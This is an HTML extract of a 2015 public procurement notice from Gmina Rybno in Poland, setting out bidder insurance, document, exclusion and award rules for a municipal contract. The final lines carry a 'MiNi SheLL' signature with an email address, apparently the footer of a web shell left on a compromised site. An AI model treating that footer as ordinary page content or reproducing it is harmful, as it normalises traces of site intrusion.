2)sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin pracy Komisji przetargowej powołanej w Urzędzie Gminy Rybno  do  przeprowadzania  postępowań o udzielenie zamówień publicznych.
3)w przypadku złożenia przez Wykonawcę dokumentów zawierających dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie  spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego z dnia publikacji ogłoszenia o niniejszym zamówieniu w  Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań ,których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający wymaga, aby Wykonawca był ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej   działalności związanej z przedmiotem zamówienia  w wysokości nie mniejszej niż  200 000,00 zł (słownie: dwieście tysięcy złotych 00/100), przy czym ważność polisy, a w przypadku jej braku innego dokumentu ubezpieczenia, musi obejmować co najmniej dzień składania oferty. Wykonawca, który zostanie wybrany na Wykonawcę przedmiotu zamówienia publicznego zobowiązany jest do przedstawienia Zamawiającemu przed podpisaniem umowy w sprawie zamówienia publicznego opłaconej polisy lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie mniejszej niż 200 000,00 zł (słownie: dwieście tysięcy złotych 00/100). Obowiązek ten nie dotyczy Wykonawcy, którego polisa lub inny dokument ubezpieczenia złożony wraz z ofertą obejmuje okres objęty realizacją przedmiotu zamówienia. W przypadku przedstawienia przez Wykonawcę Zamawiającemu przed podpisaniem umowy  w sprawie zamówienia publicznego opłaconej polisy lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej   w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie mniejszej niż 200 000,00 zł (słownie: dwieście tysięcy złotych 00/100) nieobejmującego całego okresu realizacji przedmiotu zamówienia, Wykonawca ten zobowiązany jest do przedstawienia Zamawiającemu kolejnych opłaconych polis lub innych dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej  z przedmiotem zamówienia w wysokości nie mniejszej niż 200 000,00 zł (słownie: dwieście tysięcy złotych 00/100) w okresie realizacji przedmiotu zamówienia.
2.Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu

1)ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia / nie spełnia, tzn. każdy z Wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy;
2)sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin pracy Komisji przetargowej powołanej w Urzędzie Gminy Rybno  do  przeprowadzania  postępowań o udzielenie zamówień publicznych.
3)w przypadku złożenia przez Wykonawcę dokumentów zawierających dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie  spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego z dnia publikacji ogłoszenia o niniejszym zamówieniu w  Biuletynie Zamówień Publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty wymienione w Specyfikacji Istotnych Warunków Zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - dodatkowe odbiory odpadów zielonych - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany niniejszej umowy mogą nastąpić jedynie w formie pisemnej pod rygorem nieważności.
1.	Zmiana postanowień niniejszej umowy może nastąpić jedynie w razie zaistnienia następujących okoliczności:
1) klęski żywiołowe;
2) inne warunki atmosferyczne odbiegające od typowych, uniemożliwiające wykonywanie przedmiotu niniejszej umowy;
3) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy, skutkujące niemożliwością wykonywania przedmiotu niniejszej umowy lub wykonywania czynności przewidzianych niniejszą umową.
2.	W przypadkach, o których mowa w ust. 2:
1)	Wykonawca nie ponosi odpowiedzialności za szkody wynikające z opóźnienia lub niewykonania jego zobowiązań wynikających z niniejszej umowy;
2)	Wykonawca zobowiązany będzie prowadzić te czynności, których realizacja nie podlega ograniczeniom   wynikającym z przypadków, o których mowa w ust. 2, chyba że Zamawiający uzna, iż prawdopodobne jest tylko częściowe wykonanie czynności, które będą dla niego nieprzydatne,
          3)  Wykonawca zobowiązany jest uzgodnić z Zamawiającym, czy i jakie alternatywne środki są możliwe do 
             zastosowania w celu prowadzenia czynności objętych niniejszą umową w przypadkach, o których mowa w ust. 2 oraz
         zobowiązany jest do podjęcia działań uzgodnionych w tym zakresie przez obydwie strony.Umowa w sprawie zamówienia publicznego zostanie zawarta wg.wzoru umowy stanowiacej Załącznik do niniejszej Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rybno.e-sochaczew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd gminy Rybno, ul. Długa 20, 96-514 Rybno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2015 godzina 10:00, miejsce: Urząd gminy Rybno, ul. Długa 20, 96-514 Rybno , sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com